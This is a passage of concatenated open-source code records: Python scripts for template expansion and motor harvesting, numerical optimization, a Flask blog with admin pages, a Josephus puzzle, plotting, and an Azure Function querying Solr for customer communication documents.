'$$'!\n\n m = cfg.keyword.search(lines[i][loc:])\n if m != None:\n kw = m.group(1)\n if kw == None:\n kw = m.group(2)\n loc += m.end(2) # Leave on the '{'!\n else:\n loc += m.end(1) # Leave on the '('!\n \n if kw == \"TRANSLATE\":\n argm = cfg.trargs.search(lines[i][loc:])\n if argm != None:\n loc += argm.end(3)+2\n elif kw == \"CALC\":\n argm = cfg.brackets.search(lines[i][loc:])\n if argm != None:\n loc += argm.end(1)+1\n elif kw == \"IF\":\n argm = cfg.ifargs.search(lines[i][loc:])\n if argm != None:\n kw = \"TIF\" # Triple IF!\n loc += argm.end(3)+1\n else:\n argm = cfg.parens.search(lines[i][loc:])\n if argm != None:\n loc += argm.end(1)+1\n if pos == 0 and lines[i][loc:].strip() == \"\":\n # If the $$ directive is the entire line, don't add a newline!\n loc = 0;\n i += 1\n else:\n argm = cfg.parens.search(lines[i][loc:])\n if argm != None:\n loc += argm.end(1)+1\n if pos == 0 and lines[i][loc:].strip() == \"\":\n # If the $$ directive is the entire line, don't add a newline!\n loc = 0;\n i += 1\n \n if argm != None:\n if kw == \"LOOP\":\n iname = argm.group(1)\n startloop = re.compile(\"(.*?)\\$\\$LOOP\\(\" + iname + \"(\\))\")\n endloop = re.compile(\"(.*?)\\$\\$ENDLOOP\\(\" + iname + \"(\\))\")\n t = searchforend(lines, endloop, startloop, endloop, i, loc)\n if t == None:\n print(\"Cannot find $$ENDLOOP(%s)?\" % iname)\n sys.exit(1)\n if iname[0] >= \"0\" and iname[0] <= \"9\":\n try:\n cnt = int(iname)\n except:\n cnt = 0\n ilist = [{\"INDEX\": str(n)} for n in range(cnt)]\n elif iname in 
cfg.idict.keys():\n try:\n ilist = cfg.idict[iname]\n except:\n ilist = []\n else:\n try:\n cnt = int(cfg.ddict[iname])\n except:\n cnt = 0\n ilist = [{\"INDEX\": str(n)} for n in range(cnt)]\n olddict = cfg.ddict\n for inst in ilist:\n cfg.ddict = rename_index(olddict.copy())\n cfg.ddict.update(inst)\n expand(cfg, t[0], f)\n cfg.ddict = olddict\n i = t[1]\n loc = t[2]\n elif kw == \"IF\":\n iname = argm.group(1)\n ifre = re.compile(\"(.*?)\\$\\$IF\\(\" + iname + \"(\\))\")\n endre = re.compile(\"(.*?)\\$\\$ENDIF\\(\" + iname + \"(\\))\")\n elsere = re.compile(\"(.*?)\\$\\$ELSE\\(\" + iname + \"(\\))\")\n t = searchforend(lines, endre, ifre, endre, i, loc)\n if t == None:\n print(\"Cannot find $$ENDIF(%s)?\" % iname)\n sys.exit(1)\n elset = searchforend(t[0], elsere, ifre, endre, 0, 0)\n try:\n v = cfg.ddict[iname]\n except:\n v = \"\"\n if v != \"\":\n # True, do the if!\n if elset != None:\n newlines = elset[0]\n else:\n newlines = t[0]\n expand(cfg, newlines, f)\n else:\n # False, do the else!\n if elset != None:\n newlines = t[0][elset[1]:]\n newlines[0] = newlines[0][elset[2]:]\n expand(cfg, newlines, f)\n i = t[1]\n loc = t[2]\n elif kw == \"TIF\":\n iname = argm.group(1)\n newlines = []\n try:\n v = cfg.ddict[iname]\n except:\n v = \"\"\n if v != \"\":\n # True, do the if!\n newlines.append(argm.group(2))\n else:\n # False, do the else!\n newlines.append(argm.group(3))\n expand(cfg, newlines, f)\n elif kw == \"INCLUDE\":\n try:\n fn = cfg.ddict[argm.group(1)]\n except:\n fn = argm.group(1)\n try:\n newlines=open(fn).readlines()\n expand(cfg, newlines, f)\n except:\n print(\"Cannot open file %s!\" % fn)\n elif kw == \"COUNT\":\n try:\n cnt = str(len(cfg.idict[argm.group(1)]))\n except:\n cnt = \"0\"\n f.write(cnt)\n elif kw == \"CALC\":\n # Either $$CALC{expr} or $$CALC{expr,format}.\n args = argm.group(1).split(\",\")\n output = StringIO.StringIO()\n expand(cfg, [args[0]], output)\n value = output.getvalue()\n output.close()\n if len(args) > 1:\n fmt = args[1]\n else:\n fmt = \"%d\"\n try:\n v = cfg.eval_expr(value)\n except:\n v = 0\n f.write(fmt % (v))\n elif kw == \"UP\":\n try:\n fn = cfg.ddict[argm.group(1)]\n except:\n fn = argm.group(1)\n try:\n f.write(fn[:fn.rindex('/')])\n except:\n pass\n else: # Must be \"TRANSLATE\"\n try:\n val = cfg.ddict[argm.group(1)].translate(string.maketrans(enumstring(argm.group(2)),\n enumstring(argm.group(3))))\n f.write(val)\n except:\n pass\n else:\n print(\"Malformed $$%s statement?\" % kw)\n sys.exit(1)\n continue\n \n # Just a variable reference!\n if lines[i][loc] == \"(\":\n m = cfg.parens.search(lines[i][loc:])\n else:\n m = cfg.word.search(lines[i][loc:])\n if m != None:\n try:\n val = cfg.ddict[m.group(1)]\n f.write(val)\n except:\n pass\n if lines[i][loc] == '(':\n loc += m.end(1) + 1\n else:\n loc += m.end(1)\n else:\n print(\"Can't find variable name?!?\")\n\ndef getMotorVals(pvbase):\n d = {}\n for f in fldlist:\n try:\n d[f] = caget(pvbase + \".\" + f[4:])\n except:\n d[f] = None\n return d\n\ndef makeMotor(ioc, pvbase, port, extra=\"\"):\n d = getMotorVals(pvbase)\n cat = \"Manual\"\n if extra != \"\":\n extra = \" \" + extra\n d.update({'name': pvbase,\n 'config' : 0,\n 'owner' : hutch,\n 'rec_base': pvbase,\n 'category': cat,\n 'mutex': ' ab',\n 'comment': ioc + extra,\n 'FLD_PORT': port,\n 'FLD_DHLM': None,\n 'FLD_DLLM': None })\n return d\n\ndef findMotors(cfglist, ioc):\n motors = []\n for (name, dir) in cfglist:\n if ioc != None and ioc != name:\n continue\n cfg = config()\n try:\n cfg.read_config(dir + \"/\" + name + 
\".cfg\", {})\n except:\n print(\"WARNING: %s has no configuration file!\" % name)\n continue # Wow, XCS has one *really* old controller!!\n for k in cfg.idict.keys():\n if k == 'MOTOR':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['NAME'], i['PORT'], \"\"))\n elif k == 'IPM':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['DIODE_X'], i['DDX_PORT'],\n i['NAME'] + \" IPM DIODE_X\"))\n motors.append(makeMotor(name, i['DIODE_Y'], i['DDY_PORT'],\n i['NAME'] + \" IPM DIODE_Y\"))\n motors.append(makeMotor(name, i['TARGET_Y'], i['TTY_PORT'],\n i['NAME'] + \" IPM TARGET_Y\"))\n elif k == 'PIM':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['YAG'], i['PORT'],\n i['NAME'] + \" PIM\"))\n elif k == 'SLIT':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['LEFT'], i['LEFT_PORT'],\n i['NAME'] + \" SLIT LEFT\"))\n motors.append(makeMotor(name, i['RIGHT'], i['RIGHT_PORT'],\n i['NAME'] + \" SLIT RIGHT\"))\n motors.append(makeMotor(name, i['TOP'], i['TOP_PORT'],\n i['NAME'] + \" SLIT TOP\"))\n motors.append(makeMotor(name, i['BOTTOM'], i['BOTTOM_PORT'],\n i['NAME'] + \" SLIT BOTTOM\"))\n elif k == 'NAVITAR':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['ZOOM'], i['ZOOM_PORT'],\n i['NAME'] + \" ZOOM\"))\n try:\n motors.append(makeMotor(name, i['FOCUS'], i['FOCUS_PORT'],\n i['NAME'] + \" FOCUS\"))\n except:\n pass\n elif k == 'XFLS':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['X'], i['X_PORT'],\n i['NAME'] + \" XFLS X\"))\n motors.append(makeMotor(name, i['Y'], i['Y_PORT'],\n i['NAME'] + \" XFLS Y\"))\n try:\n motors.append(makeMotor(name, i['Z'], i['Z_PORT'],\n i['NAME'] + \" XFLS Z\"))\n except:\n pass\n elif k == 'INOUT':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['MOTOR'], i['PORT'],\n i['NAME'] + \" INOUT\"))\n elif k == 'REFL':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['MIRROR'], i['PORT'],\n i['NAME'] + \" REFL\"))\n return motors\n\nif __name__ == '__main__':\n # Options( [mandatory list, optional list, switches list] )\n options = Options(['hutch'], ['ioc'], ['debug'])\n try:\n options.parse()\n except Exception as msg:\n options.usage(str(msg))\n sys.exit()\n hutch = options.hutch\n cfglist = readConfig()\n motors = findMotors(cfglist, options.ioc)\n pmgr = pmgrobj(\"ims_motor\", hutch)\n if options.debug != None:\n for m in motors:\n print(m['name'], m['FLD_PORT'], caget(m['rec_base']+\".PN\"))\n else:\n pmgr.start_transaction()\n for m in motors:\n pmgr.objectInsert(m)\n errlist = pmgr.end_transaction()\n for e in errlist:\n print(e)\n","sub_path":"pmgr/harvester.py","file_name":"harvester.py","file_ext":"py","file_size_in_byte":26657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"226797541","text":"# Error test\ndef add(a, b):\n return a+b\n\n\n# add(1)\n\ndef divide(num1, num2):\n try:\n return num1 / num2\n except ZeroDivisionError:\n return \"Please do not divide by zero\"\n except TypeError:\n return \"Please provide two integers or floats\"\n\n\nprint(divide(4, 2))\nprint(divide([], \"1\"))\nprint(divide(1, 0))\nprint()","sub_path":"ud/colt_steele/python_bootcamp/debugging_error_handling.py","file_name":"debugging_error_handling.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"597943481","text":"\nimport sys\n\ndef map_lines(lines):\n current_cid = None\n for line in lines:\n line = line.strip()\n type,val1,val2 = 
line.split(\",\", 2)\n # handle lines like: C,\"10001\",10001\n if type == 'C':\n current_cid = val2\n # handle lines like V,1001,1\n elif current_cid is not None and type == 'V':\n yield line + \",C,{}\".format(current_cid)\n\nif __name__ == '__main__':\n for line in map_lines(sys.stdin):\n print(line)","sub_path":"week4-hw/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266562414","text":"import math\nimport matrix\nimport excel_transfer\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import mlab\n\nfrom resource import expression\n\n\nclass HJPS:\n def __init__(self):\n self.commands = {\n \"commands\": {\n \"none\": 0,\n \"exit\": 1,\n \"test\": 2,\n \"clear\": 3,\n \"help\": 4,\n \"new\": 5,\n \"show slist\": 6,\n \"show scount\": 7,\n \"acc\": 8,\n \"mk\": 9,\n \"start\": 10,\n \"show result\": 11,\n \"image 1\": 12\n },\n \"description\": {\n \"none\": \"do nothing\",\n \"exit\": \"exit from module\",\n \"test\": \"do test stuff\",\n \"clear\": \"clear something\",\n \"help\": \"display helpfull information\",\n \"new\": \"enter new raw data\",\n \"show slist\": \"show raw data\",\n \"show scount\": \"show something\",\n \"acc\": \"set accuracy\",\n \"mk\": \"set default raw data\",\n \"start\": \"start calculation process\",\n \"show result\": \"show result\",\n \"image 1\": \"show visualization\"\n }\n }\n self.expression = expression.Expression(\"No name\", \"x**2\")\n self.accuracy = 3\n self.x_start = {\"x1\": 0, \"x2\": 0}\n self.x_delta = {\"x1\": 0, \"x2\": 0}\n self.result = {\"i\": [], \"xk\": [], \"x_delta\": [], \"fx\": []}\n self.epsilon = [1, 1]\n self.makedefault()\n\n\n\n def showCommands(self):\n print('')\n print(\"Commands...\")\n print(\"---\")\n for item in self.commands[\"commands\"]:\n print(str(item) + \":\")\n print(\"Number: \" + str(self.commands[\"commands\"][item]))\n print(\"Description: \" + str(self.commands[\"description\"][item]))\n print(\"---\")\n\n def enterCommand(self):\n command = \"0\"\n print('')\n print(\"Enter command (help for Q&A)\")\n while (command not in self.commands):\n command = input(\"->\")\n if (command not in self.commands[\"commands\"]):\n print(\"There is no such command\")\n else:\n return self.commands[\"commands\"][command]\n\n def showHelp(self):\n print('')\n print(\"Help v0.002\")\n self.showCommands()\n\n def makedefault(self):\n self.epsilon[0] = 10 ** (-self.accuracy)\n self.epsilon[1] = self.epsilon[0]\n self.expression = expression.Expression(\"Function\", \"(x1-2)**2+x2**2\")\n self.expression.parameters[\"unimodal\"] = True\n self.x_start = {\"x1\": 4.0, \"x2\": 6.0}\n self.x_delta = {\"x1\": 0.6, \"x2\": 0.8}\n self.result = {\"i\": [], \"xk\": [], \"x_delta\": [], \"fx\": []}\n self.h = self.epsilon\n\n def importparam(self, accuracy):\n self.accuracy = accuracy\n\n def setaccuracy(self):\n task = 0\n print('')\n print(\"Enter accuracy:\")\n while (task != 1):\n self.accuracy = int(input(\"-> \"))\n print(\"Input is correct? 
(enter - yes/n - no)\")\n command = input(\"-> \")\n if (command != \"n\"):\n task = 1\n else:\n if self.accuracy < 0:\n print(\"Please enter positive number!\")\n task = 0\n self.epsilon = 10 ** (-self.accuracy)\n self.h = self.epsilon\n\n def inputnewdata(self):\n self.expression.input_expr()\n self.expression.input_range()\n pass\n\n def dostaff(self):\n task = 0\n while (task != 1):\n print('')\n print(\"Hooke-Jeeves pattern search method\")\n print('')\n task = self.enterCommand()\n if task == 2:\n pass\n elif task == 3:\n pass\n elif task == 4:\n self.showHelp()\n elif task == 5:\n self.inputnewdata()\n elif task == 6:\n self.print_raw_data()\n elif task == 8:\n self.setaccuracy()\n elif task == 9:\n self.makedefault()\n elif task == 10:\n self.resolve()\n elif task == 11:\n self.printresult()\n\n elif task == 12:\n self.printresult_g()\n pass\n\n def print_raw_data(self):\n self.expression.show_expr()\n pass\n\n def resolve(self):\n xw = {\"x1\": 1, \"x2\": 1}\n xp = {\"x1\": 1, \"x2\": 1}\n xn = {\"x1\": 1, \"x2\": 1}\n i = 0\n chalt = False\n x = self.x_start\n dx = self.x_delta\n print('-')\n print(dx)\n self.collect_result(i, x, dx, self.expression.execute_d(x))\n print(self.result[\"x_delta\"][-1])\n\n xw = x.copy()\n fp = self.expression.execute_d(x)\n print(\"Before choose point\")\n xw = self.choose_point(x, dx, True)\n xw.pop(\"__builtins__\", None)\n print(xw)\n fw = self.expression.execute_d(xw)\n print(\"After choose point\")\n\n xn = x.copy()\n xp = x.copy()\n print(\"Before first while fw >fp?\", fw > fp)\n while fw > fp and not chalt:\n dx = self.mul(dx, self.get_alpha())\n if self.norm(dx) > self.epsilon[0]:\n xw = self.choose_point(x, dx, True)\n fw = self.expression.execute_d(xw)\n else:\n chalt = True\n\n xn = xw.copy()\n xp = x.copy()\n fn = fw\n\n if not chalt:\n i += 1\n self.collect_result(i, xn, dx, fn)\n while not self.halting_check() and not chalt:\n print(\"i\", i)\n #fp = fw\n xp.pop(\"__builtins__\", None)\n xn.pop(\"__builtins__\", None)\n xw.pop(\"__builtins__\", None)\n\n print(\"xp: \", xp)\n print(\"fp: \", fp)\n\n print(\"xn: \", xn)\n print(\"fn: \", fn)\n\n print(\"Before 2TB - BT, xw:\", xw)\n xw = self.mul(xn, 2.0)\n xw = self.dif(xw, xp)\n print(\"After 2TB - BT, xw:\", xw)\n #xw = self.choose_point(self.dif(self.mul(xn, self.get_betta()), xn), dx, True)\n xw = self.choose_point(xw, dx, True)\n xw.pop(\"__builtins__\", None)\n print(\"xw: \", xw)\n\n fw = self.expression.execute_d(xw)\n print(\"fw\", fw)\n\n print(\"dx\", dx)\n\n print(\"Before second while fw >fp?\", fw > fp)\n if fw > fp and not chalt:\n wx = xp.copy()\n dx = self.mul(dx, self.get_alpha())\n print(\"dx\", dx)\n\n if self.norm(dx) > self.epsilon[0]:\n print(\"xp: \", xp)\n xw.pop(\"__builtins__\", None)\n print(\"Before choose, xw:\", xw)\n xw = self.choose_point(xp, dx, True)\n xw.pop(\"__builtins__\", None)\n print(\"After choose, xw:\", xw)\n fw = self.expression.execute_d(xw)\n else:\n chalt = True\n xw.pop(\"__builtins__\", None)\n\n fn = fw\n print(\"Are chalt false?\", chalt)\n print(\"After second while fn < fp?\", fn < fp)\n if fn < fp and not chalt:\n fp = fn\n xp = xn.copy()\n xp.pop(\"__builtins__\", None)\n xn = xw.copy()\n xn.pop(\"__builtins__\", None)\n elif fn >= fp and not chalt:\n dx = self.mul(dx, self.get_alpha())\n xw = self.choose_point(xp, dx, True)\n xw.pop(\"__builtins__\", None)\n fw = self.expression.execute_d(xw)\n\n while fw > fp and not chalt:\n dx = self.mul(dx, self.get_alpha())\n if self.norm(dx) > self.epsilon[0]:\n xw = 
self.choose_point(xp, dx, True)\n xw.pop(\"__builtins__\", None)\n fw = self.expression.execute_d(xw)\n else:\n chalt = True\n\n if fn < fp and not chalt:\n xp = xn.copy()\n xp.pop(\"__builtins__\", None)\n xn = xw.copy()\n xn.pop(\"__builtins__\", None)\n fp = fn\n\n i += 1\n self.collect_result(i, xn, dx, fn)\n pass\n else:\n pass\n self.printresult()\n pass\n\n def halting_check(self):\n ansver = False\n if self.norm(self.dif(self.result[\"xk\"][-2], self.result[\"xk\"][-1])) / self.norm(self.result[\"xk\"][-2]) <= \\\n self.epsilon[0] and math.fabs((self.expression.execute_d(\n self.result[\"xk\"][-2]) - self.expression.execute_d(self.result[\"xk\"][-1])) / self.expression.execute_d(\n self.result[\"xk\"][-2])) <= self.epsilon[1]:\n ansver = True\n print(\"Halting check! - True\")\n else:\n ansver = False\n return ansver\n\n def get_alpha(self):\n return 0.5\n\n def get_betta(self):\n return 2.0\n\n def choose_point(self, x, dx, m):\n #print('')\n #print(\"Choose point---\")\n argument_x = [\n self.sum(x, dx),\n self.dif_part(self.sum_part(x, dx, \"x1\"), dx, \"x2\"),\n self.sum_part(self.dif_part(x, dx, \"x1\"), dx, \"x2\"),\n self.dif(x, dx)\n ]\n #print(argument_x)\n f = [self.expression.execute_d(xw) for xw in argument_x]\n #print(f)\n if m:\n r = argument_x[f.index(min(f))]\n else:\n r = argument_x[f.index(max(f))]\n #print(\"--end--\")\n return r\n\n def norm(self, v):\n s = 0.0\n v = v.copy()\n v.pop(\"__builtins__\", None)\n for item in v:\n s += math.pow(v[item], 2)\n return math.sqrt(s)\n\n def dif(self, v1, v2):\n d = v1.copy()\n d.pop(\"__builtins__\", None)\n for item in d:\n d[item] = v1[item] - v2[item]\n return d\n\n def dif_part(self, v1, v2, part):\n d = v1.copy()\n d.pop(\"__builtins__\", None)\n d[part] = v1[part] - v2[part]\n return d\n\n def sum(self, v1, v2):\n s = v1.copy()\n s.pop(\"__builtins__\", None)\n for item in s:\n s[item] = v1[item] + v2[item]\n return s\n\n def sum_part(self, v1, v2, part):\n d = v1.copy()\n d.pop(\"__builtins__\", None)\n d[part] = v1[part] + v2[part]\n return d\n\n def mul(self, v1, betta):\n v1 = v1.copy()\n v1.pop(\"__builtins__\", None)\n for item in v1:\n v1[item] *= betta\n return v1\n\n def collect_result(self, i, x, dx, f):\n x = x.copy()\n x.pop(\"__builtins__\", None)\n dx = dx.copy()\n dx.pop(\"__builtins__\", None)\n self.result[\"i\"].append(i)\n self.result[\"xk\"].append(x)\n self.result[\"x_delta\"].append(dx)\n self.result[\"fx\"].append(f)\n\n def printresult_g(self):\n pass\n\n def printresult(self):\n print(\"Result:\")\n for i in range(len(self.result[\"i\"])):\n print('')\n print(\"i:\", self.result[\"i\"][i])\n self.result[\"xk\"][i].pop(\"__builtins__\", None)\n print(\"x:\", self.result[\"xk\"][i])\n self.result[\"x_delta\"][i].pop(\"__builtins__\", None)\n print(\"dx:\", self.result[\"x_delta\"][i])\n print(\"f:\", self.result[\"fx\"][i])\n pass\n print(\"Result:\")","sub_path":"hooke_jeeves_pattern_search_old.py","file_name":"hooke_jeeves_pattern_search_old.py","file_ext":"py","file_size_in_byte":11882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336418998","text":"from flask import *\nimport json\nimport os\nimport mekblog\n\n\n# initial\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\nmekblog.config.load('config.json')\nmekblog.db.connect()\nmekblog.tag.update()\nmekblog.tag.load()\n\n# user access page\n\n@app.route('/')\ndef index():\n\t# add tags\n\treturn render_template('index.html')\n\n@app.route('/archives')\ndef 
archive_index():\n\tif 'tag' in request.args:\n\t\topt = {'tag': request.args['tag']}\n\telse:\n\t\topt = {}\n\tarchive_list = mekblog.archive.list_all(opt)\n\ttag_list = mekblog.tag.get_list()\n\treturn render_template('archive-index.html', archive_list=archive_list, tag_list=tag_list, session=session)\n\n@app.route('/archives/<small_title>')\ndef read_archive(small_title):\n\tarchive = mekblog.archive.list_one({'small-title': small_title})\n\tif archive == None:\n\t\tabort(404)\n\telse:\n\t\ttag_list = mekblog.tag.get_list()\n\t\treturn render_template('archive.html', archive=archive, tag_list=tag_list, session=session)\n\n# administrator access page\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\tif request.method == 'GET':\n\t\tif 'admin' in session:\n\t\t\treturn redirect(url_for('admin'))\n\t\telse:\n\t\t\treturn render_template('login.html')\n\telse:\n\t\tif 'username' in request.form and 'password' in request.form:\n\t\t\tif request.form['username'] == mekblog.config.setting.core.root.uid.get():\n\t\t\t\tif request.form['password'] == mekblog.config.setting.core.root.passwd.get():\n\t\t\t\t\tsession['admin'] = mekblog.config.setting.core.root.uid.get()\n\t\t\t\t\treturn redirect(url_for('admin'))\n\t\t\treturn render_template('info.html', msg=\"Wrong account or password\")\n\t\telse:\n\t\t\tabort(400)\n\n@app.route('/logout')\ndef logout():\n\tsession['admin'] = 'None'\n\tsession.pop('admin', None)\n\treturn redirect(url_for('index'))\n\n@app.route('/admin')\ndef admin():\n\tif 'admin' in session:\n\t\treturn render_template('admin.html', root_user=mekblog.config.setting.core.root.uid.get())\n\telse:\n\t\tabort(403)\n\n@app.route('/new-archive', methods=['GET', 'POST'])\ndef new_archive():\n\tif 'admin' not in session:\n\t\tabort(403)\n\tif request.method == 'GET':\n\t\treturn render_template('new-archive.html')\n\telse:\n\t\t# TODO: forward: check script\n\t\t# TODO: forward: rich-text editor\n\t\tresult, msg = mekblog.archive.post({\n\t\t\t'title': request.form['title'],\n\t\t\t'small-title': request.form['small-title'],\n\t\t\t'content': request.form['content'],\n\t\t\t'tag': request.form['tag']\n\t\t})\n\t\t# TODO: make error & alert page unified\n\t\tif not result:\n\t\t\treturn render_template('info.html', msg=msg)\n\t\telse:\n\t\t\treturn redirect(url_for('archive_index'))\n\n@app.route('/edit-archive', methods=['GET', 'POST'])\ndef edit_archive():\n\tif 'admin' not in session:\n\t\tabort(403)\n\tif request.method == 'GET':\n\t\tif 'st' not in request.args:\n\t\t\tabort(404)\n\t\tarchive = mekblog.archive.list_one({'small-title': request.args['st']})\n\t\tif archive == None:\n\t\t\tabort(404)\n\t\treturn render_template('edit-archive.html', archive=archive)\n\tif request.method == 'POST':\n\t\tresult, msg = mekblog.archive.update({\n\t\t\t'title': request.form['title'],\n\t\t\t'small-title': request.form['small-title'],\n\t\t\t'content': request.form['content'],\n\t\t\t'tag': request.form['tag']\n\t\t})\n\t\tif not result:\n\t\t\treturn render_template('info.html', msg=msg)\n\t\telse:\n\t\t\t# TODO: improve tag function\n\t\t\treturn redirect(url_for('read_archive', small_title=request.form['small-title']))\n\n@app.route('/remove-archive')\ndef remove_archive():\n\tif 'admin' not in session:\n\t\tabort(403)\n\tif 'st' not in request.args:\n\t\tabort(404)\n\tmekblog.archive.remove({'small-title': request.args['st']})\n#\tmekblog.comment.remove(request.args['st'])\n\treturn redirect(url_for('archive_index'))\n\n# TODO: ajax access page\n\n@app.route('/comment/post',
methods=['POST'])\ndef post_comment():\n\tindata = request.json\n\tmsg = mekblog.comment.post(indata)\n\treturn jsonify(msg), msg['code']\n\n@app.route('/comment/list')\ndef get_comment():\n\tif 'st' not in request.args:\n\t\tabort(400)\n\tcmt = mekblog.comment.list_by_archive(request.args['st'])\n\treturn render_template('comment.piece.html', cmt_list=cmt)\n\n@app.route(\"/settings\", methods=[\"GET\",\"POST\"])\ndef adminpanel():\n\tif \"admin\" not in session:\n\t\tabort(403)\n\tif request.method == \"GET\":\n\t\tdata = dict(mekblog.config.setting.core.root.get().items() + mekblog.config.setting.archive.get().items() + mekblog.config.setting.email.get().items())\n\t\treturn render_template(\"adminpanel.html\", data=data)\n\telse:\n\t\tf = mekblog.config.setting.core.root\n\t\tform = dict(request.form)\n\t\t# return str(form)\n\t\t# TODO: config object's views function\n\t\tfor i in f.get().items():\n\t\t\tf.cd(i[0]).set(form[i[0]][0])\n\t\tf = mekblog.config.setting.archive\n\t\tfor i in f.get().items():\n\t\t\tf.cd(i[0]).set(form[i[0]][0])\n\t\tf = mekblog.config.setting.email\n\t\tfor i in f.get().items():\n\t\t\tf.cd(i[0]).set(form[i[0]][0])\n\t\tmekblog.config.save(\"config.json\")\n\t\tdata = dict(mekblog.config.setting.core.root.get().items() + mekblog.config.setting.archive.get().items() + mekblog.config.setting.email.get().items())\n\t\tsignal = {\"after-post\":1}\n\t\treturn render_template(\"adminpanel.html\", data=data, signal=signal)\n\t\t# json\n\t\t\n\n# run as __main__\n\nif __name__ == '__main__':\n\tapp.run(debug=True,host='127.0.0.1',port=5000)\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535780900","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 17 13:31:48 2020\n\n@author: qtckp\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ny = np.random.rand(10,4)\ny[:,0]= np.arange(10)\ndf = pd.DataFrame(y, columns=[\"X\", \"A\", \"B\", \"C\"])\n\ndf['B'] = df['B'] + df['A']\n\nax = df.plot(x=\"X\", y=\"B\", kind=\"bar\")\ndf.plot(x=\"X\", y=\"A\", kind=\"bar\", ax=ax, color=\"C2\")\n\n\nplt.show()\n\n\n\n\n","sub_path":"old_data/bars2.py","file_name":"bars2.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"317334504","text":"import sys\nfrom collections import deque\n\nN, K = map(int, sys.stdin.readline().split())\npeople = deque(i+1 for i in range(N))\ntemp = deque()\nans = []\n\nwhile len(ans) != N:\n k = K\n while k > len(people):\n k -= len(people)\n\n #print(people)\n for i in range(k-1):\n temp.append(people.popleft())\n \n ans.append(people.popleft())\n\n while len(temp) > 0:\n people.append(temp.popleft())\n\nprint('<', end='')\nprint(*ans, sep=', ', end='')\nprint('>')\n\n'''\nSample input\n7 3\n\n7 6\n\nSample output\n<3, 6, 2, 7, 5, 1, 4>\n<6, 5, 7, 2, 1, 4, 3>\n'''","sub_path":"11000~11999/Q11866.py","file_name":"Q11866.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"100483463","text":"import logging\nimport json\nimport azure.functions as func\nimport pandas as pd\nimport os \nimport pysolr\nimport datetime\nfrom __app__.shared_code import settings as config\nfrom __app__.shared_code import helper\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n try:\n
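# log the invocation, parse the posted JSON body, and serialise the matched records for the response\n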
logging.info('postCustomerCommunication function processing a request.')\n result=[]\n req_body = req.get_json()\n found_data = get_customer_communication_details(req_body[0])\n result = json.dumps(found_data)\n except Exception as e:\n logging.error(str(e))\n return func.HttpResponse(result,mimetype=\"application/json\")\n\ndef get_customer_communication_details(req_body):\n try:\n all_details_json,spec_list,material_list = helper.construct_common_level_json(req_body)\n sub_category=req_body.get(\"Category_details\").get(\"Subcategory\")\n json_list=[]\n if sub_category in config.customer_communication_category:\n category=config.customer_communication_category.get(sub_category)\n communication_query=helper.unstructure_template(all_details_json,category)\n params={\"fl\":config.unstructure_column_str}\n unstructure_values,unstructure_df=helper.get_data_from_core(config.solr_unstructure_data,communication_query,params) \n if len(unstructure_values)>0:\n count=0\n for item in unstructure_values:\n try:\n json_make={}\n datastr={}\n datastr=json.loads(item.get(\"DATA_EXTRACT\",{}))\n result_spec=item.get(\"SPEC_ID\")\n product=item.get(\"PRODUCT\",config.hypen_delimiter)\n product_type=item.get(\"PRODUCT_TYPE\",config.hypen_delimiter)\n spec_id=helper.finding_spec_details(spec_list,result_spec) \n if (sub_category in [\"US FDA Letter\",\"EU Food Contact\"]):\n path=str(datastr.get(\"file_path\",config.hypen_delimiter)).strip()\n if (path.lower().endswith(\"pdf\")):\n file_split=path.split(\"/\")\n file_source=''\n for source in config.file_sources:\n if source in file_split:\n file_source=source\n break\n count+=1\n extract_field={}\n for efield in datastr:\n if efield not in config.otherfields:\n extract_field[efield]=datastr.get(efield,config.hypen_delimiter)\n json_make[\"Extract_Field\"]=extract_field\n filename=datastr.get(\"file_name\",config.hypen_delimiter) \n date=datastr.get(\"Date\",config.hypen_delimiter)\n json_make[\"spec_Id\"]=spec_id\n json_make[\"fileName\"]=filename\n json_make[\"file_Source\"]=file_source\n json_make[\"product_Type\"]=product_type\n json_make[\"productName\"]=product\n json_make[\"id\"]=count\n json_make[\"createdDate\"]=date\n path=helper.replace_char_in_url(path)\n json_make[\"url\"]=(config.blob_file_path)+path.replace(\"/dbfs/mnt/\",\"\")+(config.sas_token)\n json_list.append(json_make)\n elif sub_category==\"Heavy Metals content\":\n datastr=json.loads(datastr)\n path=datastr.get(\"file_path\",\"\")\n file_split=path.split(\"/\")\n file_source=''\n for source in config.file_sources:\n if source in file_split:\n file_source=source\n break\n json_make[\"spec_Id\"]=spec_id\n json_make[\"file_Source\"]=file_source\n json_make[\"product\"]=product\n json_make[\"product_Type\"]=product_type\n json_make[\"aka\"]=remove_nan(datastr.get(\"AKA\",config.hypen_delimiter))\n json_make[\"batch\"]=remove_nan(datastr.get(\"Batch #\",config.hypen_delimiter))\n json_make[\"sample\"]=remove_nan(datastr.get(\"Sample 